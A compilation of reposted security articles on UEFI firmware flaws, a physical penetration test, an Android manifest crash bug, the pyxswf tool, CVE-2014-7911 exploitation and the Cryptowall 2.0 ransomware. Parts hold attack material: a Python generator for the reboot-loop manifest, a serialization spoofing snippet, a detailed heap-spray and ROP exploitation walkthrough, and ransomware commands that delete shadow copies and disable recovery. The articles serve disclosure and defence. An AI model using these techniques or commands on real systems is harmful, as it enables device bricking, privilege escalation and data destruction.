The second vulnerability, CVE-2014-8273, is a race condition affecting certain Intel chipsets, and it can be exploited by a local, authenticated attacker to bypass the BIOS write protection mechanism and write malicious code to the platform firmware.

Another security hole disclosed by Wojtczuk and Kallenberg is a buffer overflow vulnerability (CVE-2014-8271) in the EDK1 UEFI reference implementation.

"The impact of the vulnerability depends on the earliness at which the vulnerable code can be instantiated. Generally, as the boot up of the platform progresses, the platform becomes more and more locked down.
Specifically, things like the SPI Flash containing the platform firmware, [System Management Mode (SMM)], and other chipset configurations become locked,” explained Wojtczuk and Kallenberg. “In an ideal (for the attacker) scenario, the vulnerable code can be instantiated before the SPI flash is locked down, thus resulting in an arbitrary reflash of the platform firmware.”

The advisories published by CERT/CC show that potentially affected vendors were notified in September and October. Some of these organizations have determined whether their products are affected, but the status for many of them is currently “unknown.” CVE-2014-8271 has been confirmed to impact Insyde Software products. UEFI firmware from American Megatrends Incorporated (AMI) and Phoenix Technologies is affected by CVE-2014-8273. CVE-2014-8274 has been confirmed to affect AMI, Phoenix and Intel solutions, but Dell is also on the list of possibly impacted vendors.

In a separate presentation at CCC, Trammell Hudson demonstrated how an attacker can make malicious modifications to the firmware of Apple MacBooks.

Sursa: Researchers Find Several UEFI Vulnerabilities | SecurityWeek.Com
5. Social Engineering: The dangers of positive thinking The assumption that everything's okay is a risky one By Steve Ragan CSO | Jan 5, 2015 7:00 AM PT

CSO Online recently spoke to a person working in the security field with a rather unique job. He's paid to break into places, such as banks and research facilities (both private and government), in order to test their resistance to social engineering and physical attacks. Rarely is he caught, but even when he is it doesn't matter, and the reason for his success is the same in each case – human nature.

Caught on film: When the surveillance video starts playing, the images show a typical day at a bank somewhere in the world. Business is steady, but the lobby isn't overly packed with customers, so a single teller is working the window. Soon, the bank supervisor walks to the left in greeting. At thirty-five seconds in, Jayson Street, the Infosec Ranger at Pwnie Express, a company that specializes in creating unique hacking tools for professionals, makes his first appearance.

Dressed in jeans, a DEF CON jacket and red ThunderCat high-tops, Street is taking a casual stroll behind the counter. Not only is he in the bank, he's in an area that's supposed to be secure and limited only to authorized personnel. Given the location of the bank, somewhere outside of the United States, Street is clearly not a local or a customer. He's there to perform a penetration test; in this case he's testing both physical security as well as network security, but the staff don't know this.

A few seconds later, the supervisor is on screen pointing to a computer that's currently being used by an employee. Street nods his head in agreement, and moments later he's granted physical access to the system. He's plugging a USB drive into the computer's front port and running software, which requires the employee to stop working with a customer and relinquish his seat for a moment.
Articol complet: Social Engineering: The dangers of positive thinking | CSO Online
6. Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices 1:57 am (UTC-7) | by Simon Huang (Mobile Security Engineer)

Every Android app comprises several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a continuous cycle of rebooting—rendering the device nearly useless to the user.

The Manifest File Vulnerability

The vulnerability can cause the OS to crash in two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stop and the whole system consequently reboots once.

The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter:

<intent-filter>
    <action android:name="android.intent.action.MAIN"/>
    <category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>

If there are many activities defined with this intent-filter, the same number of icons will be created on the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000: For Android OS version 4.4, the launcher process will undergo the reboot.
For version L, the PackageParser crashes and reboots. The malformed .APK will be installed, but no icon will be displayed. If the number of activities is larger than 100,000, the device will undergo the loop of rebooting.

Testing the Vulnerability, Part 1

We created an .APK file with a manifest file containing a huge string reference, as seen in Figure 1. During installation, the device reboots, as seen in the logcat information in Figure 2.

Figure 1. AndroidManifest with DTD huge string reference
Figure 2. The OS crashes and reboots during installation

We have tested and proven that this created APK could crash Android OS 4.4.4, Android OS L, and older versions of the platform.

Testing the Vulnerability, Part 2

We also created an application with the manifest file as shown in Figure 3, which can make Android devices undergo a loop of reboots. After installation, the device was unresponsive, save for the rebooting. A user will not even be able to uninstall the APK or switch off the device. It will simply reboot until the device runs out of power. The only solution is to flash the ROM or install the platform again.

Figure 3. AndroidManifest.xml with 100,000 icons

Knowing the Risks

While this vulnerability isn't technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but only if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue.

Sursa: Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices | Security Intelligence Blog | Trend Micro
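To make the second trigger concrete, here is a rough Python sketch that generates a manifest of the kind described above, declaring an arbitrary number of launcher activities. The package and activity names are made-up placeholders, not values from the original report:

```python
# Sketch: build an AndroidManifest.xml declaring `count` launcher activities,
# each with the MAIN/LAUNCHER intent-filter that creates a home-screen icon.
# Package and activity names below are hypothetical placeholders.
ICON_ACTIVITY = (
    '    <activity android:name=".A{n}">\n'
    '      <intent-filter>\n'
    '        <action android:name="android.intent.action.MAIN"/>\n'
    '        <category android:name="android.intent.category.LAUNCHER"/>\n'
    '      </intent-filter>\n'
    '    </activity>\n'
)

def build_manifest(count):
    """Return a manifest string declaring `count` launcher activities."""
    body = "".join(ICON_ACTIVITY.format(n=i) for i in range(count))
    return (
        '<manifest xmlns:android="http://schemas.android.com/apk/res/android"\n'
        '          package="com.example.test">\n'
        '  <application>\n' + body + '  </application>\n'
        '</manifest>\n'
    )

manifest = build_manifest(3)
print(manifest.count("<intent-filter>"))  # 3
```

Packaging the output of build_manifest(100000) into an APK would correspond to the 100,000-icon scenario from the article; a small count just shows the shape of the generated manifest.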
7. pyxswf

pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis. It is part of the python-oletools package.

pyxswf is an extension to xxxswf.py published by Alexander Hanel. Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on Ixia. It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option). For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.

Usage

Usage: pyxswf.py [options] <file.bad>

Options:
  -o, --ole             Parse an OLE file (e.g. Word, Excel) to look for SWF in each stream
  -f, --rtf             Parse an RTF file to look for SWF in each embedded object
  -x, --extract         Extracts the embedded SWF(s), names it MD5HASH.swf & saves it in the working dir. No addition args needed
  -h, --help            show this help message and exit
  -y, --yara            Scans the SWF(s) with yara. If the SWF(s) is compressed it will be deflated. No addition args needed
  -s, --md5scan         Scans the SWF(s) for MD5 signatures. Please see func checkMD5 to define hashes. No addition args needed
  -H, --header          Displays the SWFs file header. No addition args needed
  -d, --decompress      Deflates compressed SWFS(s)
  -r PATH, --recdir=PATH
                        Will recursively scan a directory for files that contain SWFs. Must provide path in quotes
  -c, --compress        Compresses the SWF using Zlib

Example 1 - detecting and extracting a SWF file from a Word document on Windows:

C:\oletools>pyxswf.py -o word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
        [ADDR] SWF 1 at 0x8 - FWS Header

C:\oletools>pyxswf.py -xo word_flash.doc
OLE stream: 'Contents'
[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
        [ADDR] SWF 1 at 0x8 - FWS Header
                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf

Example 2 - detecting and extracting a SWF file from a RTF document on Windows:

C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
RTF embedded object size 1498557 at index 000036DD
[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_000036DD
        [ADDR] SWF 1 at 0xc40 - FWS Header
                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf

How to use pyxswf in Python applications: TODO

Sursa: https://bitbucket.org/decalage/oletools/wiki/pyxswf
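As a side note, the core detection idea shared by xxxswf and pyxswf is to scan a byte buffer for SWF magic values (FWS for uncompressed, CWS for zlib-compressed, ZWS for LZMA-compressed files) followed by a plausible version byte and file length. A loose Python sketch of that idea (not pyxswf's actual implementation) could look like this:

```python
import struct

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib, LZMA

def find_swf_headers(data):
    """Scan a byte buffer for candidate SWF headers and return
    (offset, magic, version, declared_length) tuples. This is a loose
    sketch; real tools apply more thorough sanity checks (e.g. the
    declared length of a compressed SWF is the *uncompressed* size)."""
    hits = []
    for magic in SWF_MAGICS:
        start = 0
        while True:
            idx = data.find(magic, start)
            if idx == -1:
                break
            if idx + 8 <= len(data):
                version = data[idx + 3]
                length = struct.unpack_from("<I", data, idx + 4)[0]
                # crude plausibility checks on version and length
                if 1 <= version <= 50 and length <= len(data) - idx:
                    hits.append((idx, magic.decode(), version, length))
            start = idx + 1
    return sorted(hits)

# toy buffer: 8 junk bytes, then an uncompressed SWF header (v10, 64 bytes)
blob = b"\x00" * 8 + b"FWS" + bytes([10]) + struct.pack("<I", 64) + b"\x00" * 60
print(find_swf_headers(blob))  # [(8, 'FWS', 10, 64)]
```

This is essentially what the `[ADDR] SWF 1 at 0x8 - FWS Header` lines in the examples above report: the offset and flavor of each carved candidate.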
8. CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation posted by: Yaron Lavi and Nadav Markus on January 6, 2015 6:00 AM

In this post we discuss CVE-2014-7911 and the various techniques that can be used to achieve privilege escalation. We also examine how some of these techniques can be blocked using several security mechanisms.

The Vulnerability

CVE-2014-7911 was presented here along with a very descriptive POC that was written by Jann Horn. Described briefly, ObjectInputStream doesn't validate that the serialized object's class type, as described in the serialized object, is actually serializable. It creates an instance of the wanted class anyway with the deserialized values of the object. Therefore, one can create an object of any class, and control its private variables, by serializing objects of another class that will be deserialized as data members of the wanted class. Let's look at the example below. The following snippet (copied from the original POC) shows a spoofed BinderProxy instance:

package AAdroid.os;

import java.io.Serializable;

public class BinderProxy implements Serializable {
    private static final long serialVersionUID = 0;
    public long mObject = 0x1337beef;
    public long mOrgue = 0x1337beef;
}

In the POC code provided above, an attacker serializes a class named AAdroid.os.BinderProxy and changes its name to android.os.BinderProxy after marshalling it, and before sending it to the system server. The android.os.BinderProxy class isn't serializable, and it involves native code that handles mObject and mOrgue as pointers. If it were serializable, the pointer values wouldn't be deserialized, but their dereferenced values would.
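Conceptually, the marshal-then-rename step can be pictured with a small Python sketch: serialize the lookalike class, then patch its name (chosen with the same length as the real one) inside the raw bytes. The toy stream below only stands in for a real Java serialization stream:

```python
# Sketch of the name-swap step described above. "AAdroid.os.BinderProxy" is
# deliberately the same length as "android.os.BinderProxy": class names are
# stored with a length prefix, so only an equal-length swap keeps the
# serialized stream well-formed. Illustrative only.
FAKE_NAME = b"AAdroid.os.BinderProxy"
REAL_NAME = b"android.os.BinderProxy"
assert len(FAKE_NAME) == len(REAL_NAME)

def spoof_class_name(serialized: bytes) -> bytes:
    """Replace the benign class name with the target one in a byte stream."""
    return serialized.replace(FAKE_NAME, REAL_NAME)

# toy stand-in for a serialized stream: Java stream magic (0xACED0005),
# a 2-byte length prefix (0x16 == 22), the class name, then trailing data
stream = b"\xac\xed\x00\x05" + b"\x00\x16" + FAKE_NAME + b"..."
patched = spoof_class_name(stream)
print(REAL_NAME in patched)  # True
```

The patched stream then gets handed to the system server, whose ObjectInputStream happily instantiates the named class with the attacker-chosen field values.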
The deserialization code in ObjectInputStream deserializes the sent object as an android.os.BinderProxy instance, leading to type confusion. As mentioned earlier, this type confusion results in the native code reading pointer values from the attacker's spoofed android.os.BinderProxy, supposedly private fields, which the attacker modified. Specifically, the field of interest is mOrgue. The android.os.BinderProxy contains a finalize method that will result in native code invocation. This native code uses mOrgue as a pointer. This is the finalize method:

protected void finalize() throws Throwable {
    destroy();
    super.finalize();
    return;
    Exception exception;
    exception;
    super.finalize();
    throw exception;
}

And this is the declaration of destroy:

private final native void destroy();

The native destroy function:

static void android_os_BinderProxy_destroy(JNIEnv* env, jobject obj)
{
    IBinder* b = (IBinder*) env->GetIntField(obj, gBinderProxyOffsets.mObject);
    DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue);
    LOGDEATH("Destroying BinderProxy %p: binder=%p drl=%p\n", obj, b, drl);
    env->SetIntField(obj, gBinderProxyOffsets.mObject, 0);
    env->SetIntField(obj, gBinderProxyOffsets.mOrgue, 0);
    drl->decStrong((void*)javaObjectForIBinder);
    b->decStrong((void*)javaObjectForIBinder);
    IPCThreadState::self()->flushCommands();
}

Eventually, the native code invokes decStrong (i.e., in drl->decStrong((void*)javaObjectForIBinder)). Note that at this point, drl is controlled by an attacker, as evident from the line:

DeathRecipientList* drl = (DeathRecipientList*) env->GetIntField(obj, gBinderProxyOffsets.mOrgue);

So decStrong is going to be called with the attacker controlling the 'this' pointer. Let's take a look at the decStrong code from the RefBase class source:

void RefBase::decStrong(const void* id) const
{
    weakref_impl* const refs = mRefs;
    refs->removeStrongRef(id);
    const int32_t c = android_atomic_dec(&refs->mStrong);
#if PRINT_REFS
    ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c);
#endif
    ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs);
    if (c == 1) {
        refs->mBase->onLastStrongRef(id);
        if ((refs->mFlags&OBJECT_LIFETIME_MASK) == OBJECT_LIFETIME_STRONG) {
            delete this;
        }
    }
    refs->decWeak(id);
}

Note the line refs->mBase->onLastStrongRef(id); these lines will eventually lead to arbitrary code execution. In the following screenshot of the RefBase::decStrong assembly, the attacker controls r0 (the 'this' pointer).

Exploitation

The first use of the controlled register r0, which contains the 'this' pointer (drl), is in these lines:

weakref_impl* const refs = mRefs;
refs->removeStrongRef(id);
const int32_t c = android_atomic_dec(&refs->mStrong);

These lines are translated to the following assembly:

ldr r4, [r0, #4]    # attacker controls r4
mov r6, r1
mov r0, r4
blx <android_atomic_dec ()>

First, r4 is loaded with the mRefs variable.
ldr r4, [r0, #4]    # attacker controls r4

Note that r0 is the 'this' pointer of the drl, and mRefs is the first private variable following the virtual function table, hence it is 4 bytes after the 'this' pointer. Then, android_atomic_dec is called with &refs->mStrong:

const int32_t c = android_atomic_dec(&refs->mStrong);

This is translated to:

mov r0, r4
blx <android_atomic_dec ()>

r0 now contains &refs->mStrong. Note that the mStrong variable is the first data member of refs (in the class weakref_impl), and that this class contains no virtual functions, hence it does not contain a vtable, so the mStrong variable is at offset 0 of r4.
As one can tell – the line refs->removeStrongRef(id); is not present in the assembly simply because the compiler optimized and omitted it, since it has an empty implementation, as one can see from the following code:

void removeStrongRef(const void* /*id*/) { }

Following the call to android_atomic_dec are these lines of code:

if (c == 1) {
    refs->mBase->onLastStrongRef(id);

These are translated to the following assembly lines:

cmp r0, #1
bne.n d1ea
ldr r0, [r4, #8]
mov r1, r6
ldr r3, [r0, #0]
ldr r2, [r3, #12]
blx r2

Note that android_atomic_dec returns the value of the specified memory address before the decrement took place. So in order to invoke refs->mBase->onLastStrongRef(id) (blx r2), we must get refs->mStrong to hold the value of 1. As we can see up to now, an attacker has several constraints that he must adhere to if he wishes to gain code execution:

- drl (our first controlled pointer, i.e. r0 when entering decStrong) must point to a readable memory location.
- refs->mStrong must have the value of 1.
- The dereference chain at the line refs->mBase->onLastStrongRef(id) must succeed and eventually point to an executable address.

In addition, an attacker must overcome the usual obstacles of exploitation – ASLR and DEP. One can employ basic techniques to fulfill these requirements and overcome the mentioned security mechanisms, including heap spraying, stack pivoting and ROP. Let's look at these in detail.

Heap spray

An attacker's first step will be to get a reliable readable address with arbitrary data – most commonly achieved by a heap spray.
The system server provides several core functionalities for the Android device, many of which are exposed to applications via various service interfaces. A common paradigm to invoke a service in the context of the system server is the following:

LocationManager lm = (LocationManager)getSystemService(LOCATION_SERVICE);

The acquired manager allows us to invoke functionality in the system server on our behalf, via IPC. Several services could be used for a heap spray, but for the purpose of this blog, we decided to use a heap spray that requires special app permissions, to prevent normal applications from utilizing this technique. The location manager allows us to register test providers via the function addTestProvider, allowing us to pass an arbitrary name that contains arbitrary data. As mentioned, one should enable developer options and enable the mock locations option in order to utilize this.

lm.addTestProvider(builder.toString(), false, false, false, false, false, false, false, 1, 1);

Note that this heap spray does have its limitations – the data is sprayed using the name field, which is Unicode. This imposes a limitation – we are limited to byte sequences which correspond to valid Unicode code points.

Spray addresses manipulation

After spraying the system server process memory address space, we encountered another issue – our chosen static address indeed pointed to readable data on each run, but not to the exact same offset in the spray chunk each time. We decided to solve this problem by crafting a special spray that contains decreasing pointer values.
Here is an illustration of the sprayed buffer, followed by an explanation of its structure:

- STATIC_ADDRESS is the arbitrarily chosen static pointer placed in mOrgue.
- GADGET_BUFFER_OFFSET is the offset of GADGET_BUFFER from the beginning of the spray.

In each run of the system server process, the static address we chose points to our controlled data, but at a different offset. r0 (which always holds the same chosen STATIC_ADDRESS) can fall on any offset in the "Relative Address Chunk", and can therefore point to any of the STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N addresses on any given run. Note the following equation:

GADGET_BUFFER = Beginning_of_spray + GADGET_BUFFER_OFFSET

In the case that r0 (=STATIC_ADDRESS) points to the beginning of the spray:

STATIC_ADDRESS = Beginning_of_spray
Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET

In any other case, r0 (=STATIC_ADDRESS) points to an offset inside the spray (the offset is dword aligned):

STATIC_ADDRESS = Beginning_of_spray + 4N
Beginning_of_spray = STATIC_ADDRESS - 4N
Hence: GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N

The higher the offset in the chunk that r0 (=STATIC_ADDRESS) points to, the more we have to subtract to make the expression STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N point to GADGET_BUFFER. No matter which offset in the chunk r0 points to, dereferencing it will give us the current address of GADGET_BUFFER. But where do we land if we dereference the other addresses in the chunk? The farther above r0 we go, the farther below GADGET_BUFFER the dereference takes us. Now that we have a valid working spray, let's go back to analyzing the assembly.
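The offset bookkeeping above can be sanity-checked with a few lines of Python; the concrete addresses are arbitrary placeholders, not values from the exploit:

```python
# Quick check of the spray arithmetic, with made-up example values.
STATIC_ADDRESS = 0x30000000        # arbitrarily chosen pointer placed in mOrgue
GADGET_BUFFER_OFFSET = 0x1000      # offset of GADGET_BUFFER within the spray

def gadget_buffer_addr(beginning_of_spray):
    """GADGET_BUFFER = Beginning_of_spray + GADGET_BUFFER_OFFSET."""
    return beginning_of_spray + GADGET_BUFFER_OFFSET

def relative_entry(n):
    """Value stored where STATIC_ADDRESS lands when the spray base is
    STATIC_ADDRESS - 4N: dereferencing it must always yield GADGET_BUFFER."""
    return STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4 * n

# wherever STATIC_ADDRESS falls inside the chunk (dword-aligned), the stored
# value points at the current GADGET_BUFFER for that run
for n in range(64):
    spray_base = STATIC_ADDRESS - 4 * n
    assert relative_entry(n) == gadget_buffer_addr(spray_base)
print("offsets consistent")
```

In other words, each dword of the relative-address chunk compensates exactly for its own distance from the spray base, which is why the dereference works regardless of where the chunk landed.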
ldr r4, [r0, #4]
mov r0, r4
blx <android_atomic_dec ()>
cmp r0, #1

So to overcome the second constraint, in which refs->mStrong must contain 1:

ldr r4, [r0, #4]  -->  r4 = [STATIC_ADDRESS + 4]  -->  r4 = GADGET_BUFFER - 4

[r4] should contain 1, hence [GADGET_BUFFER - 4] should contain 1. Now that the android_atomic_dec return value is indeed 1, we should overcome the other dereferences to get to the blx opcode.

cmp r0, #1
bne.n d1ea
                         ; r4 = GADGET_BUFFER - 4
ldr r0, [r4, #8]         ; r0 = [GADGET_BUFFER - 4 + 8] <-> r0 = [GADGET_BUFFER + 4]
mov r1, r6
ldr r3, [r0, #0]         ; r3 = [[GADGET_BUFFER + 4] + 0] <-> r3 = [[GADGET_BUFFER + 4]]

Note that in order to succeed with this dereference, [GADGET_BUFFER + 4] should contain a KNOWN valid address. We arbitrarily chose the known address – STATIC_ADDRESS.

ldr r2, [r3, #12]        ; r2 = [GADGET_BUFFER + 12]
blx r2

So now we can build the GADGET_BUFFER as follows:

ROP CHAIN

We chose to run the "system" function with a predefined command line. In order to control the r0 register, and make it point to the command line string, we should use some gadgets that manipulate the registers. We get only one function call, so to take control of the execution flow with our gadgets, we should use a stack pivot gadget. Therefore, the first function pointer is the preparation for the stack pivot gadget, where r5 equals the original r0 (STATIC_ADDRESS) as one can see at the beginning of decStrong.
mov r0, r5               ; restoring r0 to its original value
ldr r7, [r5]             ; r7 = [STATIC_ADDRESS] = GADGET_BUFFER
ldr r2, [r7, #0x54]      ; r2 = [GADGET_BUFFER + 84]
blx r2

This calls the next gadget, which should be kept 21 (=0x54/4) dwords from the beginning of GADGET_BUFFER. This gadget does the stack pivoting: the SP register is made to point to r7, therefore the stack is under our control and points to GADGET_BUFFER. It returns to the next gadget, which should be kept 8 dwords from the beginning of GADGET_BUFFER (note the pop {r4-r11,pc} instruction, which pops 8 registers off the stack before popping pc).

r0 = [r0 + 0x38]         ; r0 = GADGET_BUFFER - 0x38 (as explained before about the spray)

Now r0 points to 56 (0x38) bytes before GADGET_BUFFER, so we have 52 command line chars, excluding the "1" for atomic_dec. It returns to the next gadget, which should be kept 10 dwords from the beginning of GADGET_BUFFER (2 dwords after the current gadget – pop {r3,pc}). That is the last gadget, where we call system! Here is an updated layout of the memory for this to happen:

Android and ARM

There are two important issues we should keep in mind when choosing the gadget addresses. There is an ASLR mechanism on Android, and the addresses won't be the same every time. In order to know the correct addresses, we use the fact that both the system server process and our app are forked from the same process – zygote – meaning we share the same modules. So we get the addresses of the necessary modules in the system server process by parsing the maps file of our own process. 'maps' is a file in /proc/<pid>/maps which contains the memory layout and the loaded modules' addresses.
On ARM CPUs, there are two modes of opcode parsing: ARM (4 bytes per opcode) and THUMB (variable width, 2 or 4 bytes per opcode). This means that the same address pointed to by PC can be parsed differently by the CPU when running in different modes. Parts of the gadgets we use are in THUMB mode. In order to make the processor change its mode when parsing those gadgets, we change the pointer from the actual address to (address | 1), turning on the LSB, which makes the CPU jump to the correct address in THUMB mode.

PAYLOAD

As described before, we use the "system" function to run our command line. The length of the command line is limited, and a command line can't actually be used for every purpose. So we decided to use a precompiled ELF that is written to the file system as an asset of our app. This ELF can do anything with uid 1000 (the uid of system server). The command line we send as an argument to system is simply "sh -c " + file_path.

CONCLUSION

Android has some common security mechanisms such as ASLR and DEP which should make exploitation of a vulnerability harder to achieve. Moreover, every application runs in its own process, so IPC communication can be validated, and guessing the memory layout shouldn't be easy. On the other hand, the fact that every process is forked from the same process makes ASLR irrelevant for vulnerabilities within zygote's children, and the binder connection from every process to the system server can lead to a heap spray, as seen in this post. These issues appear to be inherent in the Android OS design. Palo Alto Networks has been researching an Android security solution that, based on our lab testing, would have blocked this exploit (as well as other exploits) with multiple exploit mitigation modules. We hope to share more details in the coming months.

Sursa: CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks Blog
9. Ransomware on Steroids: Cryptowall 2.0 Talos Group | January 6, 2015 at 7:14 am PST This post was authored by Andrea Allievi and Earl Carter.

Ransomware holds a user's data hostage. The latest ransomware variants encrypt the user's data, thus making it unusable until a ransom is paid to retrieve the decryption key. The latest variant, Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-VM and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64-bit code directly from its 32-bit dropper. Under the Windows 32-bit on Windows 64-bit (WOW64) environment, it is indeed able to switch the processor execution context from 32 bit to 64 bit.

Initial Compromise

Cryptowall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious PDF files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, "Win32k.sys Elevation of Privilege Vulnerability", to achieve the initial privilege escalation on x86-based machines. This exploit works on 32-bit OSs beginning with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit on all vulnerable AMD64 Windows systems. Provided the anti-VM and anti-emulation checks pass, the Cryptowall malware is decrypted and installed on the system. Once the system is infected, the user is presented a message similar to Figure 1.

Figure 1. (Click to Enlarge)

Constructing the Unencrypted Cryptowall Binary

To construct the unencrypted Cryptowall 2.0 code, the dropper goes through multiple stages of decryption. The main dropper is a C++ MFC application. The first-stage decryption code is located at "CMainFrame::OnCreate" in the MFC event handler.
The handler builds the first-stage decryption code (at RVA +0xF3F0) and simply calls it. The first-stage decryption code opens the original dropper PE, reads from it, and decrypts a big chunk of code (the second stage). Finally, it transfers execution to the second stage located in the external buffer. The second stage is the last encryption-layer code. It builds a simple Import Address Table (IAT) and implements multiple features. The most important one is the anti-VM check. The anti-VM code is quite simple:

Figure 2: The CryptoWall simple Anti-VM check code. (Click to Enlarge.)

If no VM is detected, another "dropper" process is spawned in a suspended state. The "ZwUnmapViewOfSection" API is used to unmap the original PE buffer. A new memory chunk is allocated and a new PE (extracted and decrypted from the ".data" section) is copied into its preferred base address. Then the new process's thread is resumed with the following new context, and the original process terminates:

- The EAX register is set to the new PE entry point address;
- The EBX register is set to a still unknown value: 7ffd8008

Installing Cryptowall on the System

The "VirusExplorerMain" routine in the faked "explorer" process constructs the IAT and installs CryptoWall on the victim system. The first step is to create an executable with a name based on the computer's MD5 hash. This executable is copied to the location specified by the "%APPDATA%" environment variable ("C:\Users\<Username>\AppData\Roaming"). To maintain persistence, an auto-start registry value is added in:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

Note: The RunOnce value is preceded by a '*' so that the process starts even in Safe Mode. The same random executable is copied to the "Startup" folder of the Start Menu. The last duty of the faked "explorer" process is to disable all system protections.
The following shell commands are executed:

vssadmin.exe Delete Shadows /All /Quiet
bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

The following services are also disabled: Security Center, Windows Defender, Windows Update, Background Intelligent Transfer Service, ERSvc, Windows Error Reporting Service. Finally, the original dropper process is terminated and the file is deleted. The Cryptowall PE is now injected into a faked "svchost" process in the same way as the fake "explorer" process was created initially. The infection now continues in the faked "svchost" process.

The "VirusSvchostMain" function (RVA 0x418C70) is the main infection routine. It constructs the virus IAT (importing functions from the following modules: ntdll, kernel32, advapi32, user32, wininet, ole32, gdi32), checks whether the installation is done, and creates the main Cryptowall event. It then creates the main Cryptowall thread and tries to download the TOR client used for communication from one of the following URLs. If it succeeds in downloading the update file, it executes it directly. The downloaded binary is an executable that is encrypted 3 times with a simple algorithm. After decryption, a clean PE file is extracted and launched. This PE file is peculiar because it has all its normal headers (DOS header, NT header, IAT, EAT, …) stripped. Its IAT and ".data" section reside in another big memory buffer. The decryption code deals with the correct linking and relocation. This clean PE is actually the Cryptowall TOR communication module. It implements a complete TOR client that it utilizes for Command & Control communication. The TOR URLs used by the sample we analyzed were:

crptarv4hcu24ijv.onion
crptbfoi5i54ubez.onion
crptcj7wd4oaafdl.onion

Using hardcoded IP addresses in the PE, the malware connects to the TOR server with an encrypted SSL connection on port 443 or 9090.
After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset +0x2E9FC.

Figure 3: The code of the DGA algorithm in the TOR client

If the encrypted connection goes well, the communication with the Cryptowall Command & Control server takes place; otherwise, the main thread sleeps for a random number of seconds and then retries with a newly generated server name. Each of the many SSL connections Cryptowall 2.0 establishes uses random server names in the certificates. However, the client certificates share commonalities that are unique enough to make it possible to detect these client connections outbound. Cryptowall 2.0 makes many, many requests once installed. Initially, Cryptowall 2.0 attempts to identify the external address of the network the system is operating on, using the “GetExternalIpAddr” function. It accomplishes this by communicating with one of the following addresses:

http://wtfismyip.com/text
http://ip-addr.es
http://myexternalip.com/raw
http://curlmyip.com

It starts with wtfismyip.com and stops after the first successful reply is received. In most situations, this means that it will end up only going to wtfismyip.com (since it is the first entry in the list). Although this is a fairly generic request, it shouldn’t be a very common occurrence in an enterprise network, so it can serve as a potential network indicator of this malware. Another interesting aspect of the sample we analyzed is that it includes some 64-bit code (and an exploit DLL) directly in its main 32-bit executable. Although the main module runs in 32-bit mode, it is capable of executing all the 64-bit functions it needs. It accomplishes this by performing a direct processor execution-context switch. The code pushes two 32-bit values onto the stack: the low DWORD of the 64-bit function's address, and the selector of a 64-bit code segment.
push <32Bit Selector>
push <32Bit Low DWORD address>
retf

It finally performs a FAR RET (opcode 0xCB). As the Intel manuals say, this kind of opcode executes a “far return”: a return to a calling procedure located in a different segment than the current code segment. The target code segment is a 64-bit one, and as a result the processor switches its execution context. To return to 32-bit mode, the code reverses this process:

call $+5 ; This will push the 64-bit return address on the stack
mov dword ptr [esp+4], <32Bit Selector> ; The same as PUSH <32bit value>, keep in mind
mov dword ptr [esp], <32Bit Address> ; that all values are 8 bytes wide in AMD64 mode
retf

This mixing of 64-bit code into the 32-bit main executable is difficult even for IDA to disassemble. Figure 4 shows a dump of a Windows 7/8 64-bit Global Descriptor Table (GDT):

